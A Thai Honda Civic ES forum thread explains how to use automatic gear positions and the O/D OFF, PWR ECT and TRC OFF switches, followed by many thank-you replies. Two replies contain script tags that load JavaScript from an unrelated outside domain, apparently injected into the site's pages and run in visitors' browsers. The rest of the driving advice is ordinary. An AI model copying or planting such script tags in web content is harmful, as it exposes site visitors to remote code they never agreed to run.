ตอบ
john


เข้าร่วม: 29 มีนา 2010
ตอบ: 570

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 3392
ให้คำขอบคุณ: 2458

ที่อยู่: UB.
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 10 กุมภา 2011 21:12 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
การใช้เกียร์อัตโนมัติและปุ่มสวิทช์ควบคุมต่างๆ


เกียร์อัตโนมัติจะมีตำแหน่งบอกของแต่ละเกียร์ ซึ่งแต่ละเกียร์จะมีหน้าที่แตกต่างกัน เพื่อให้ผู้ขับขี่สามารถเลือกใช้ตำแหน่งของเกียร์ได้ อย่างถูกต้อง และทุกครั้งที่จะทำการเปลี่ยนเกียร์จากตำแหน่ง “P” หรือ “N” ไปยังตำแหน่งเกียร์อื่นๆ ควรทำการเหยียบเบรกไว้ด้วยทุกครั้ง และป้องกันการ กระตุกของตัวรถด้วย




•เกียร์ “ P ” จอดและสตาร์ทเครื่องยนต์ ตำแหน่งนี้ใช้เมื่อจอดรถ ซึ่งจะล็อคเกียร์ได้ ป้องกันไม่ให้รถเลื่อนไหลและ สามารถสตาร์ทเครื่องยนต์ติดได้
•เกียร์ “ R ” ถอยหลัง ตำแหน่งนี้จะทำให้รถเคลื่อนที่ถอยหลัง
•เกียร์ “ N ” เกียร์ว่าง เมื่ออยู่ในตำแหน่งนี้ เครื่องยนต์จะไม่เชื่อมต่อกำลังกับล้อรถ ทำให้รถเลื่อนไหลไปมาได้ และสามารถสตาร์ทเครื่องยนต์ติดได้
•เกียร์ “ D ” ขับ เมื่อเข้าอยู่ในตำแหน่งนี้รถจะเคลื่อนที่ออกไปข้างหน้า เมื่อคุณเหยียบคันเร่งขณะที่รถแล่นเร็วขึ้น เกียร์ก็จะเปลี่ยนขึ้นเองโดยอัตโนมัติ และเมื่อลดความเร็วระดับของเกียร์ก็จะลดเปลี่ยนเองตามความเร็ว
•เกียร์ “ 2 ” เกียร์ 2 ในตำแหน่งนี้ เกียร์จะเปลี่ยนเฉพาะเกียร์ 1 และ 2 เท่านั้น เมื่อต้องการให้เครื่องยนต์ช่วยเบรกหรือต้องการขับลงเขา
•เกียร์ “ L ” เกียร์ต่ำ ในตำแหน่งนี้ เกียร์จะทำงานที่เกียร์ 1 อย่างเดียว ใช้เมื่อต้องการการฉุดลากมากกว่าเกียร์ 2 หรือต้องการให้เครื่องยนต์ช่วยเบรกมากกว่าเกียร์ 2

ข้อควรระวัง ในการใช้เกียร์อัตโนมัติ
• ขณะที่รถหยุดนิ่งควรเหยียบเบรกก่อนเข้าเกียร์
• ก่อนที่จะเปลี่ยนเกียร์กลับทิศทางเดินหน้าหรือถอยหลังควรที่จะให้รถหยุดสนิทเสียก่อน
• ไม่ควรกดปุ่มปลดล็อคในการเปลี่ยนเกียร์ ซึ่งจะใช้เฉพาะเกียร์ที่ต้องกดปุ่มปลดล็อคเท่านั้น เช่น เกียร์ P,R,2 และ L

ข้อควรระวังที่ได้กล่าวถึงนี้ เพื่อจะได้เป็นประโยชน์ต่อเจ้าของรถเอง เนื่องจากในขณะที่จะเข้าเกียร์เดินหน้าหรือถอยหลัง ควรให้รถจอดให้สนิทเสียก่อน เพื่อป้องกันผ้าคลัทช์ที่อยู่ในชุดเกียร์สึกหรอเร็วกว่าปกติ เพราะความแตกต่างระหว่างรอบของเครื่องยนต์ที่สูง อาจทำให้ผ้าคลัทช์ในชุดเกียร์ ์เกิดการลื่นไถลในขณะที่จะทำการจับยึดกับแผ่นรอง จึงทำให้เกิดการสึกหรอที่เร็วขึ้นและยังทำให้น้ำมันเกียร์สกปรกเร็วขึ้นด้วย ดังนั้นในการเปลี่ยน เกียร์ควรหยุดรถให้สนิทเสียก่อน พร้อมกับเหยียบเบรกไว้เพื่อป้องกันการกระตุก และให้คลัทช์ได้จับเต็มที่ก่อนก่อนที่จะทำการเหยียบคันเร่งเพื่อออกรถหรือถอยหลังต่อไป

อีกเรื่องที่ข้อควรระวังได้กล่าวถึง คือ เรื่องการกดปุ่มปลดล๊อคเกียร์ ก็เพื่อป้องกันอันตรายจากการพลาดไปเข้าเกียร์ผิด เช่น ในขณะที่ต้องการจอดรถหรือจะเปลี่ยนจาก D ไป N หากเรากดปุ่มปลดล็อคเกียร์ไว้ด้วย อาจจะทำให้หลุดจากเกียร์ N ไปที่ R ได้ ซึ่งอาจทำให้เกิดอันตรายหรืออุบัติเหตุได้ ดังนั้นเราต้องการจะเปลี่ยนจาก D ไป N ควรจะเลื่อนเกียร์ไปเลยไม่ต้องกดปุ่มปลดล็อค เพื่อไม่ให้เกียร์เลยไปที่ R หรือ P เพราะนอกจากจะทำให้เกียร์ชำรุด แล้วยังอาจจะทำให้เกิดอันตรายต่อผู้ขับขี่และผู้ที่อยู่ในรถรวมถึงบุคคลอื่นด้วย

ปุ่มสวิทช์โอเวอร์ไดร์ฟ [O/D OFF]
ปุ่มสวิทช์โอเวอร์ไดร์ฟ [O/D OFF] จะมีไว้เพื่อเป็นปุ่มกดสวิทช์โอเวอร์ไดร์ฟอ๊อฟ [O/D OFF] รถจะวิ่งได้ 3 เกียร์ คือเกียร์ 1 ถึงเกียร์ 3 [D3] และสวิทช์โอเวอร์ไดร์ฟออน [O/D ON] รถจะวิ่งได้ 4 เกียร์ คือเกียร์ 1 ถึงเกียร์ 4 [D4] แต่อย่างไรก็ตามควรให้โอเวอร์ไดร์ฟออน [O/D ON] เพื่อที่รถยนต์จะวิ่งได้ครบทุกเกียร์ หากโอเวอร์ไดร์ฟอ๊อฟ [O/D OFF] แสดงขึ้นมาที่หน้าปัทม์รถยนต์แสดงว่ารถจะวิ่งได้แค่ 3 เกียร์ คือ [D1,2,3] จะมีผลต่อการกินน้ำมันเชื้อเพลิง ดังนั้นเมื่อขับขี่ด้วยความเร็ว ปกติควรให้โอเวอร์ไดร์ฟออน [O/D ON] ไว้ตลอดเวลาเพื่อช่วยประหยัดน้ำมันเชื้อเพลิง ซึ่งสวิทช์โอเวอร์ไดร์ฟอ๊อฟ [ O/D OFF ] จะใช้ก็ต่อเมื่อรถวิ่งที่ความเร็วปกติ เกียร์ [D4] และเมื่อเราต้องการที่จะเร่งแซงรถคันข้างหน้าเราจึงกดปุ่มสวิทช์โอเวอร์ไดร์ฟอ๊อฟ [ O/D OFF ] รถก็จะเปลี่ยนจากเกียร์ [D4] มาเป็น [D3] ทำให้รถมีกำลังที่จะวิ่งแซงรถคันข้างหน้า เมื่อเราวิ่งแซงรถคันข้างหน้าได้ แล้วเราควรยกเลิกโอเวอร์ไดร์ฟอ๊อฟ [O/D OFF] ให้เป็น โอเวอร์ไดร์ฟออน [ O/D ON ] รถก็จะเปลี่ยนจากเกียร์ [D3] มาเป็น [D4] รถก็จะวิ่งด้วยความเร็วปกติ




ปุ่มสวิทช์ PWR ECT
ปุ่มสวิทช์ PWR ECT จะมีไว้เพื่อ เมื่อเรากดปุ่ม PWR ECT นี้ จะทำให้ระยะเวลาในการเปลี่ยนเกียร์จาก D1--> D2--> D3--> D4 [ ขับขี่ที่ตำแหน่ง “D”] จะยาวขึ้นหรือเหมือนกับการลากเกียร์เป็นการขับขี่แบบสปอร์ จะทำให้มีการเปลี่ยนเกียร์ที่รอบเครื่องยนต์สูงกว่าปกติ จึงมีผลทำให้รถมีอัตราเร่งที่ดีขึ้น เหมาะสำหรับการขับขี่บน Hi-WAY เพื่อเพิ่มความสนุกสนานในการขับขี่ แต่อย่างไรก็ตามขอแนะนำให้ใช้การขับขี่ในโหมด “ ปกติ ” เพื่อประหยัดน้ำมันเชื้อเพลิง เนื่องจากโหมด “ ปกติ ” จะคำนวณปริมาณการฉีดน้ำมันเชื้อเพลิง ให้เหมาะสมกับการใช้งานในรอบเครื่องยนต์นั้นๆ ซึ่งถูกควบ คุมโดยกล่องควบคุมเครื่องยนต์ตามความเหมาะสมกับภาระของเครื่องยนต์ และตามลักษณะของการขับขี่ขณะนั้น โดยประมวลผลจากเซ็นเซอร์ต่างๆ ของเครื่องยนต์ จึงทำให้มีความประหยัดน้ำมันเชื้อเพลิงในการขับขี่ มากกว่าการขับขี่ในโหมด PWR ECT


ปุ่มสวิทช์ TRC OFF
ปุ่มสวิทช์ TRC OFF จะมีไว้ใช้สำหรับยกเลิกการใช้งานของระบบป้องกันการตะกุยหรือล้อหมุนฟรีของรถยนต์ ซึ่งจะใช้ในกรณีที่รถติดหล่ม เพื่อไม่ให้มีการตัดกำลังจากเครื่องยนต์ ที่จะส่งไปยังชุดเกียร์และล้อ ทำให้ล้อสามารถหมุนได้อย่างเต็มที่ เพื่อที่จะได้หลุดจากอุปสรรคนั้นได้ ซึ่งจะแตกต่างจากเฟืองท้ายแบบลิมิตเต็ดสลิป แต่ถ้าหากไม่มีสวิทช์ TRC OFF เมื่อรถติดหล่มก็จะไม่สามารถขึ้นจากหล่มได้ เนื่องจากเมื่อรถติดหล่มล้อรถก็จะหมุนฟรี ีระบบป้องกันล้อหมุนฟรีก็จะทำงานโดยการตัดกำลังของเครื่องยนต์ที่จะส่งไปยังชุดเกียร์ มีผลทำให้รถไม่มีกำลังที่จะขึ้นจากหล่มนั้นได้ โดยเมื่อจะใช้งานให้กดสวิทช์ TRC OFF ไฟก็จะติดที่หน้าปัทม์เรือนไมล์ ......เพื่อแสดงว่าระบบได้ยกเลิกการใช้งานระบบป้องกันล้อหมุนฟรีแล้วจึงทำให้รถสามารถขึ้นจากหล่มนั้นได้


Attached File :
การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
Attached File :
การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
Attached File :
การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
Attached File :
การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
suwitjim


ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

ที่อยู่: กทม. ลาดกระบัง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 11 กุมภา 2011 09:49 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ได้รับคำขอบคุณจาก: surapong  khem_hatyai 
curran


ชื่อเล่น: บี

เข้าร่วม: 07 กันยา 2009
ตอบ: 4300

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2057
ให้คำขอบคุณ: 5484

ที่อยู่: Samutprakarn
ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 11 กุมภา 2011 10:48 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ขอบคุณข้อมูลครับ
ได้รับคำขอบคุณจาก: surapong  khem_hatyai 
tit_ch


เข้าร่วม: 24 ธันวา 2009
ตอบ: 276

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 332
ให้คำขอบคุณ: 496

ที่อยู่: อ่างทอง ลพบุรี อยุธยา
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 12 กุมภา 2011 08:56 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ได้รับคำขอบคุณจาก: surapong  khem_hatyai 
wangyu


ชื่อเล่น: เอ๊ช

เข้าร่วม: 17 มิถุนา 2010
ตอบ: 7619

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6468
ให้คำขอบคุณ: 7442

ที่อยู่: ลำผักชี,หนองจอก,ลาดกระบัง,มาบตาพุด ระยอง
ปี: 2005
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 16 กุมภา 2011 14:43 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง


ขอบคุณสำหรับความรู้คับ

ได้รับคำขอบคุณจาก: john  khem_hatyai 
kkwan


ชื่อเล่น: ขวัญ

เข้าร่วม: 15 กุมภา 2011
ตอบ: 8

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 5
ให้คำขอบคุณ: 14

ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 16 กุมภา 2011 17:23 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ขอบคุณค้า ข้อมูลใหม่ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: john  khem_hatyai 
nooduean_69


ชื่อเล่น: นู๋เดือน

เข้าร่วม: 04 ตุลา 2011
ตอบ: 1224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 3195

ที่อยู่: Minburi
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 17 พฤศจิกา 2011 10:23 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
สวดยอดเลยค่ะ
ได้รับคำขอบคุณจาก: john  khem_hatyai 
korn_es05


เข้าร่วม: 16 กันยา 2010
ตอบ: 39

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 11
ให้คำขอบคุณ: 23

ที่อยู่: Phuket + surat
ปี: 2005
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 17 พฤศจิกา 2011 11:19 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ได้รับคำขอบคุณจาก: john  khem_hatyai 
DEAR ES 02


ชื่อเล่น: เดียร์

เข้าร่วม: 17 ตุลา 2009
ตอบ: 620

Guru ES
Guru ES

ได้รับคำขอบคุณ: 310
ให้คำขอบคุณ: 1175

ที่อยู่: Bangkok
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 17 พฤศจิกา 2011 11:26 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ได้รับคำขอบคุณจาก: john  khem_hatyai 
tood


เข้าร่วม: 08 มีนา 2010
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 297
ให้คำขอบคุณ: 1

ที่อยู่: ติวานนท์
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 17 พฤศจิกา 2011 11:28 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ข้อมูลเยี่ยมมากครับผม
ได้รับคำขอบคุณจาก: john  khem_hatyai 
jetsada_poongren


ชื่อเล่น: ต๋อง

เข้าร่วม: 22 ตุลา 2011
ตอบ: 21

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 15
ให้คำขอบคุณ: 0

ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 17 พฤศจิกา 2011 11:53 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
หาาบทความดีมาอีกนะครับย น่าสนใจและเป็นประโยชน์มากๆ
ได้รับคำขอบคุณจาก: john  khem_hatyai 
วุฒิชัย


ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

ที่อยู่: แม่สอด-ตาก-โขทัย-อุตรดิตถ์
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 17 พฤศจิกา 2011 19:16 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ได้รับคำขอบคุณจาก: khem_hatyai  john 
jacky19


ชื่อเล่น: แก๊ส

เข้าร่วม: 24 สิงหา 2009
ตอบ: 612

Guru ES
Guru ES

ได้รับคำขอบคุณ: 568
ให้คำขอบคุณ: 602

ที่อยู่: นนท์
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 17 พฤศจิกา 2011 21:29 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ได้รับคำขอบคุณจาก: khem_hatyai  john 
kai_es


เข้าร่วม: 19 เมษา 2010
ตอบ: 1133

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 714
ให้คำขอบคุณ: 365

ที่อยู่: หาดใหญ่
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 17 พฤศจิกา 2011 23:18 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ขอบคุณข้อมูลดีๆครับ
ได้รับคำขอบคุณจาก: khem_hatyai  john 
deo20


เข้าร่วม: 16 ธันวา 2010
ตอบ: 970

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1192
ให้คำขอบคุณ: 107

ที่อยู่: ฉะเชิงเทรา
ศุกร์, 18 พฤศจิกา 2011 09:53 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ขอบคุณครับ

ได้รับคำขอบคุณจาก: khem_hatyai  john 
khem_hatyai


ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ที่อยู่: เกิดที่ นครศรีฯ ตอนนี้ สงขลา
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 7 ธันวา 2011 21:51 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
เก่งขึ้นอีกเยอะเลยเรา........... "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: john 
Nack_Non


ชื่อเล่น: แน๊ก ชาลี

เข้าร่วม: 01 ธันวา 2011
ตอบ: 346

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 242
ให้คำขอบคุณ: 216

ที่อยู่: นนทบุรี-บางกรวย หลังก.ฟ.ผ.
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 7 ธันวา 2011 22:10 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ขอบคุณครับ
ได้รับคำขอบคุณจาก: john 
phichetza


ชื่อเล่น: เชษ

เข้าร่วม: 17 ตุลา 2011
ตอบ: 1590

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1420
ให้คำขอบคุณ: 3612

ที่อยู่: สุราษฎร์ธานี
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 8 ธันวา 2011 09:14 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ได้รับคำขอบคุณจาก: john 
pairut


เข้าร่วม: 17 สิงหา 2010
ตอบ: 52

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 17
ให้คำขอบคุณ: 116

ที่อยู่: ชลบุรี
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 10 ธันวา 2011 01:17 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ขอบคุณครับ :) :)
ได้รับคำขอบคุณจาก: john 
onut0627


เข้าร่วม: 24 กันยา 2011
ตอบ: 179

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 208
ให้คำขอบคุณ: 87
อาทิตย์, 11 ธันวา 2011 14:14 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ข้อมูลแน่ๆๆๆครับ
ได้รับคำขอบคุณจาก: civic03zaza  zoom  john 
karaoke


เข้าร่วม: 09 ธันวา 2011
ตอบ: 8

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 6
ให้คำขอบคุณ: 0
อาทิตย์, 11 ธันวา 2011 14:28 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ข้อมูลดีดีแบบนี้ ขอบคุณครับ
ได้รับคำขอบคุณจาก: john 
lordpark


ชื่อเล่น: ปาร์ค

เข้าร่วม: 16 กันยา 2011
ตอบ: 714

Guru ES
Guru ES

ได้รับคำขอบคุณ: 640
ให้คำขอบคุณ: 1517

ที่อยู่: สายไหม นวลจันทร์ เสรีไทย
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 11 ธันวา 2011 22:01 - การใช้เกียร์อัตโนมัติ และปุ่มต่างๆที่ถูกต้อง
ขอบคุณครับ
ได้รับคำขอบคุณจาก: john 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.